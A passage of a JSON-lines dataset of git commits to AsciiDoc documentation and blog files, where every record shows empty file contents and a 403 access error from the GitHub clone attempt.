asticsearch,SaiprasadKrishnamurthy\/elasticsearch,StefanGor\/elasticsearch,rmuir\/elasticsearch,Helen-Zhao\/elasticsearch,kingaj\/elasticsearch,AndreKR\/elasticsearch,pranavraman\/elasticsearch,rhoml\/elasticsearch,acchen97\/elasticsearch,strapdata\/elassandra5-rc,wayeast\/elasticsearch,springning\/elasticsearch,mjhennig\/elasticsearch,dongjoon-hyun\/elasticsearch,thecocce\/elasticsearch,Liziyao\/elasticsearch,JervyShi\/elasticsearch,MisterAndersen\/elasticsearch,vrkansagara\/elasticsearch,ThalaivaStars\/OrgRepo1,jimhooker2002\/elasticsearch,yongminxia\/elasticsearch,zkidkid\/elasticsearch,dylan8902\/elasticsearch,spiegela\/elasticsearch,sscarduzio\/elasticsearch,Siddartha07\/elasticsearch,ivansun1010\/elasticsearch,pranavraman\/elasticsearch,hirdesh2008\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,tebriel\/elasticsearch,rmuir\/elasticsearch,awislowski\/elasticsearch,jchampion\/elasticsearch,golubev\/elasticsearch,cnfire\/elasticsearch-1,combinatorist\/elasticsearch,i-am-Nathan\/elasticsearch,sscarduzio\/elasticsearch,bestwpw\/elasticsearch,anti-social\/elasticsearch,YosuaMichael\/elasticsearch,Flipkart\/elasticsearch,nilabhsagar\/elasticsearch,lmtwga\/elasticsearch,sc0ttkclark\/elasticsearch,springning\/elasticsearch,djschny\/elasticsearch,sposam\/elasticsearch,snikch\/elasticsearch,mmaracic\/elasticsearch,wimvds\/elasticsearch,girirajsharma\/elasticsearch,markharwood\/elasticsearch,petabytedata\/elasticsearch,achow\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,pritishppai\/elasticsearch,xuzha\/elasticsearch,camilojd\/elasticsearch,himanshuag\/elasticsearch,masterweb121\/elasticsearch,Liziyao\/elasticsearch,Helen-Zhao\/elasticsearch,szroland\/elasticsearch,hanswang\/elasticsearch,xpandan\/elasticsearch,iamjakob\/elasticsearch,fernandozhu\/elasticsearch,hanst\/elasticsearch,fekaputra\/elasticsearch,ulkas\/elasticsearch,Chhunlong\/elasticsearch,hirdesh2008\/elasticsearch,winstonewert\/elasticsearch,Charlesdong\/elasticsearch,Uiho\/elasticsearch,smflorentino\/elasticsearch,shreejay\/elasticsearch,abibell\/elasticsearch,Fsero\/elasticsearch,geidies\/elasticsearch,KimTaehee\/elasticsearch,Rygbee\/elasticsearch,queirozfcom\/elasticsearch,zeroctu\/elasticsearch,wayeast\/elasticsearch,iamjakob\/elasticsearch,s1monw\/elasticsearch,overcome\/elasticsearch,kunallimaye\/elasticsearch,ckclark\/elasticsearch,chirilo\/elasticsearch,petmit\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,mkis-\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,Charlesdong\/elasticsearch,ivansun1010\/elasticsearch,wayeast\/elasticsearch,andrestc\/elasticsearch,onegambler\/elasticsearch,TonyChai24\/ESSource,girirajsharma\/elasticsearch,Helen-Zhao\/elasticsearch,kaneshin\/elasticsearch,truemped\/elasticsearch,wbowling\/elasticsearch,Ansh90\/elasticsearch,alexshadow007\/elasticsearch,ThalaivaStars\/OrgRepo1,s1monw\/elasticsearch,Shepard1212\/elasticsearch,fernandozhu\/elasticsearch,Charlesdong\/elasticsearch,geidies\/elasticsearch,chrismwendt\/elasticsearch,linglaiyao1314\/elasticsearch,ThalaivaStars\/OrgRepo1,NBSW\/elasticsearch,hafkensite\/elasticsearch,caengcjd\/elasticsearch,codebunt\/elasticsearch,nrkkalyan\/elasticsearch,tahaemin\/elasticsearch,iacdingping\/elasticsearch,kaneshin\/elasticsearch,nellicus\/elasticsearch,18098924759\/elasticsearch,strapdata\/elassandra-test,markharwood\/elasticsearch,mm0\/elasticsearch,clintongormley\/elasticsearch,wuranbo\/elasticsearch,btiernay\/elasticsearch,alexkuk\/elasticsearch","old_file":"docs\/reference\/query-dsl\/filters\/range-filter.asciidoc","new_file":"docs\/reference\/query-dsl\/filters\/range-filter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a87fd6630990395ddb1aafd6276ac45a89df1c20","subject":"Create Readme.adoc","message":"Create Readme.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.19-3\/alpine\/Readme.adoc","new_file":"1.0.0-beta.19-3\/alpine\/Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4f01d3fa99687d1bc1b41c77ed6dd34dcb78380","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b36f0b83e1288f17bd0a79c61790371b7a1b2153","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c4c892d167cabd8e1a9477a62ddfe73b1e12bdc","subject":"Update 2018-03-09-AWS-ECS.adoc","message":"Update 2018-03-09-AWS-ECS.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2018-03-09-AWS-ECS.adoc","new_file":"_posts\/2018-03-09-AWS-ECS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a99aa5fc5b491fa824b142ae84d924241137490","subject":"y2b create post Are You Ready For The Zombie Apocalypse?","message":"y2b create post Are You Ready For The Zombie Apocalypse?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-29-Are-You-Ready-For-The-Zombie-Apocalypse.adoc","new_file":"_posts\/2013-04-29-Are-You-Ready-For-The-Zombie-Apocalypse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe9e372cc87b46bb81b415b7376b4c5443ad9e3e","subject":"y2b create post iPhone 5s Fingerprint Scanner: Is it safe?","message":"y2b create post iPhone 5s Fingerprint Scanner: Is it safe?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-16-iPhone-5s-Fingerprint-Scanner-Is-it-safe.adoc","new_file":"_posts\/2013-09-16-iPhone-5s-Fingerprint-Scanner-Is-it-safe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db0f8131b1fe9b11157270d2e5843d4750434165","subject":"Update 2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","message":"Update 2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","new_file":"_posts\/2016-05-14-How-to-build-a-speedy-and-stable-Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cab4e1962f9316ad67094695d2c452894e4f613","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9636b33d862a8f7ef517bce252642e829cbd0343","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0809ae5a8565d60a63a2fa0a7933920b766abef","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6ec1e9e586659a99291f2c6ffa5e6e0986f9122","subject":"Publish 2016-11-10.adoc","message":"Publish 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"2016-11-10.adoc","new_file":"2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88966ae954e4e01f88a4cffcceb1765e345ec8fd","subject":"y2b create post The Best Sounding Smartphone","message":"y2b create post The Best Sounding Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-06-The-Best-Sounding-Smartphone.adoc","new_file":"_posts\/2015-08-06-The-Best-Sounding-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74f3db2325a98694102f366073bf94c6687bf146","subject":"Update 2017-07-15-Ansible-and-rolling-upgrades.adoc","message":"Update 2017-07-15-Ansible-and-rolling-upgrades.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-07-15-Ansible-and-rolling-upgrades.adoc","new_file":"_posts\/2017-07-15-Ansible-and-rolling-upgrades.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"047343c7bfd12abac8580faf5fa5f420acd7bdb1","subject":"Update 2015-09-19-JSON-syntax.adoc","message":"Update 2015-09-19-JSON-syntax.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_file":"_posts\/2015-09-19-JSON-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb1e85ff36adf32bb23118192a0dd77c202baa0a","subject":"Update 2017-01-25-Spring-Boot.adoc","message":"Update 2017-01-25-Spring-Boot.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-01-25-Spring-Boot.adoc","new_file":"_posts\/2017-01-25-Spring-Boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ba612ab725613bf264a7416492fcc9acb9cbab","subject":"Update 2019-01-26-true-source.adoc","message":"Update 2019-01-26-true-source.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-01-26-true-source.adoc","new_file":"_posts\/2019-01-26-true-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbd3930caf49fa19c06a974dad1cb7120085063f","subject":"Add README with general purpose and module overview","message":"Add README with general purpose and module overview\n","repos":"lordofthejars\/arquillian-universe-bom,arquillian\/arquillian-universe-bom,smiklosovic\/arquillian-universe-bom,lordofthejars\/arquillian-universe-bom","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lordofthejars\/arquillian-universe-bom.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d54a4a78290fca428f1fa619a4effba28e49e494","subject":"Trying to fix link.","message":"Trying to fix link.","repos":"haumacher\/jbake,kaulkie\/jbake,rajmahendra\/jbake,uli-heller\/jbake,haumacher\/jbake,mtolk\/jbake,xuyanxiang\/jbake,ancho\/jbake,haumacher\/jbake,jbake-org\/jbake,ineiros\/jbake,jonbullock\/jbake,danielgrycman\/jbake,leonac\/jbake,ineiros\/jbake,Vad1mo\/JBake,mohitkanwar\/jbake,haumacher\/jbake,uli-heller\/jbake,mohitkanwar\/jbake,rajmahendra\/jbake,HuguesH\/jbake,xuyanxiang\/jbake,kaulkie\/jbake,Vad1mo\/JBake,xuyanxiang\/jbake,ineiros\/jbake,danielgrycman\/jbake,kaulkie\/jbake,HuguesH\/jbake,mtolk\/jbake,mohitkanwar\/jbake,HuguesH\/jbake,uli-heller\/jbake,Vad1mo\/JBake,leonac\/jbake,jonbullock\/jbake,mtolk\/jbake,jbake-org\/jbake,rajmahendra\/jbake,ancho\/jbake,danielgrycman\/jbake,leonac\/jbake","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ineiros\/jbake.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e10390c323055ab3692229ce2a5d29031e7df13","subject":"Updated badges to reflect repo transfer.","message":"Updated badges to reflect repo transfer.","repos":"Vad1mo\/JBake,mtolk\/jbake,danielgrycman\/jbake,kaulkie\/jbake,jbake-org\/jbake,xuyanxiang\/jbake,Vad1mo\/JBake,mtolk\/jbake,uli-heller\/jbake,mohitkanwar\/jbake,HuguesH\/jbake,HuguesH\/jbake,danielgrycman\/jbake,mohitkanwar\/jbake,ancho\/jbake,mohitkanwar\/jbake,HuguesH\/jbake,xuyanxiang\/jbake,rajmahendra\/jbake,uli-heller\/jbake,haumacher\/jbake,ineiros\/jbake,kaulkie\/jbake,xuyanxiang\/jbake,mtolk\/jbake,jonbullock\/jbake,danielgrycman\/jbake,ineiros\/jbake,ineiros\/jbake,jonbullock\/jbake,leonac\/jbake,uli-heller\/jbake,rajmahendra\/jbake,leonac\/jbake,ancho\/jbake,leonac\/jbake,haumacher\/jbake,rajmahendra\/jbake,haumacher\/jbake,Vad1mo\/JBake,jbake-org\/jbake,kaulkie\/jbake,haumacher\/jbake","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuguesH\/jbake.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21652745304a21d9ec8dd6b5e0030baf77429a48","subject":"docs\/instcomp: manual for instcomp","message":"docs\/instcomp: manual for instcomp\n\nthis probably should go into the docs repo\n","repos":"kinsamanka\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,unseenlaser\/machinekit,bobvanderlinden\/machinekit,araisrobo\/machinekit,RunningLight\/machinekit,unseenlaser\/machinekit,Cid427\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,kinsamanka\/machinekit,bobvanderlinden\/machinekit,mhaberler\/machinekit,bobvanderlinden\/machinekit,RunningLight\/machinekit,RunningLight\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,ArcEye\/machinekit-testing,mhaberler\/machinekit,kinsamanka\/machinekit,RunningLight\/machinekit,bobvanderlinden\/machinekit,unseenlaser\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,kinsamanka\/machinekit,kinsamanka\/machinekit,ArcEye\/machinekit-testing,strahlex\/machinekit,ArcEye\/machinekit-testing,mhaberler\/machinekit,ArcEye\/MK-Qt5,bobvanderlinden\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,Cid427\/machinekit,Cid427\/machinekit,strahlex\/machinekit,Cid427\/machinekit,RunningLight\/machinekit,unseenlaser\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,Cid427\/machinekit,RunningLight\/machinekit,kinsamanka\/machinekit,kinsamanka\/machinekit,araisrobo\/machinekit,bobvanderlinden\/machinekit,RunningLight\/machinekit,araisrobo\/machinekit,ArcEye\/machinekit-testing,araisrobo\/machinekit,ArcEye\/machinekit-testing,ArcEye\/machinekit-testing,unseenlaser\/machinekit,unseenlaser\/machinekit,unseenlaser\/machinekit,Cid427\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,bobvanderlinden\/machinekit,Cid427\/machinekit,bobvanderlinden\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,Cid427\/machinekit,mhaberler\/machinekit,ArcEye\/machinekit-testing,mhaberler\/machinekit,ArcEye\/machinekit-testing,unseenlaser\/machinekit,kinsamanka\/machinekit,mhaberler\/machinekit,RunningLight\/machinekit","old_file":"src\/hal\/icomp-example\/instcomp.asciidoc","new_file":"src\/hal\/icomp-example\/instcomp.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bobvanderlinden\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a2291c62dae77a6d351576f343712ab16b8a9b95","subject":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","message":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d50ce2a1d62652cbf2c4e541faf73cd73ec4745","subject":"Python note: Some Pip notes","message":"Python note: Some Pip notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"341be73f47010c54884e8f88aca8321fd97ae112","subject":"More polish","message":"More polish\n","repos":"wangcan2014\/tut-bookmarks,Sheparzo\/tut-bookmarks,DongsunPark\/bookmarks,razordaze\/tut-bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8c4f679963b129e8712b9a47703cb8057029f4d","subject":"Update README","message":"Update README\n\n- Remove section about the Maven properties. There is (and will only\n ever be) only 1 target at a time, no need for users to configure it.\n- Add Travis and Coverity badges. It looks cool.\n\nSigned-off-by: Alexandre Montplaisir <0b9d8e7da097b5bbfe36e48cca5acfe475f18227@efficios.com>\n","repos":"lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bef42ef32b1c4aa01b2eb64d8f503f84fe8c5914","subject":"Readme: Add section Run with Waitress","message":"Readme: Add section Run with Waitress\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"707bd33d5f24c7b51819f2265b15bd12193c4d0f","subject":"Create README.adoc","message":"Create README.adoc","repos":"PureSolTechnologies\/DuctileDB,PureSolTechnologies\/DuctileDB,PureSolTechnologies\/DuctileDB,PureSolTechnologies\/DuctileDB","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PureSolTechnologies\/DuctileDB.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2cf5cc3fd1075e4fd611732531319ef1a6b7762","subject":"Typos correction in README.adoc","message":"Typos correction in README.adoc\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfb67d36a136f7474f04ce99e1a04c8014b816f1","subject":"Update 2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","message":"Update 2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","repos":"mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io","old_file":"_posts\/2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","new_file":"_posts\/2012-09-20-Installing-PHP-erlang-bridge-on-centos-62.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mnishihan\/mnishihan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa2fd6b94fa68ce1689ed9a7cc0e406b44abd90","subject":"y2b create post Glacier White PS4 Unboxing (Destiny Bundle)","message":"y2b create post Glacier White PS4 Unboxing (Destiny Bundle)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-11-Glacier-White-PS4-Unboxing-Destiny-Bundle.adoc","new_file":"_posts\/2014-09-11-Glacier-White-PS4-Unboxing-Destiny-Bundle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a12ccd73ce3b4793907d3197f8ee0232dae266ab","subject":"Create domain-operations.asciidoc","message":"Create domain-operations.asciidoc","repos":"janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire","old_file":"doc\/domain-operations.asciidoc","new_file":"doc\/domain-operations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janScheible\/rising-empire.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"896e6de633a9f8e514058d1113f9367e06486e43","subject":"Update 2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","message":"Update 2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","repos":"padurean\/padurean.github.io,padurean\/padurean.github.io","old_file":"_posts\/2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","new_file":"_posts\/2016-07-15-Primu-meu-postttt-pa-Hub-Press-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/padurean\/padurean.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f9b565e70dd3f1c649d279d215c3076e2dd546c","subject":"Update 2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","message":"Update 2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","new_file":"_posts\/2016-09-19-Migrate-Eclipse-RCP-3x-to-Compatibility-Layer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"150dc34d465f5994e68185d29d94db53f121c1e8","subject":"y2b create post Epson Artisan 837 - A cool multifunction printer?","message":"y2b create post Epson Artisan 837 - A cool multifunction printer?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-10-Epson-Artisan-837--A-cool-multifunction-printer.adoc","new_file":"_posts\/2012-03-10-Epson-Artisan-837--A-cool-multifunction-printer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c200c43a007e97314fdffbbe6b89a290152cfd24","subject":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","message":"Update 2016-06-10-Log-Zoom-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_file":"_posts\/2016-06-10-Log-Zoom-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97373300aff554549be6e0dc77f806abdb40a719","subject":"Update 2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","message":"Update 2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","new_file":"_posts\/2016-10-02-Computer-Science-Week-5-Sorting-Algorithms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1770ed9320499d47e363920bd40c12b085610333","subject":"y2b create post Apple iPhone 4S: Keynote Review","message":"y2b create post Apple iPhone 4S: Keynote 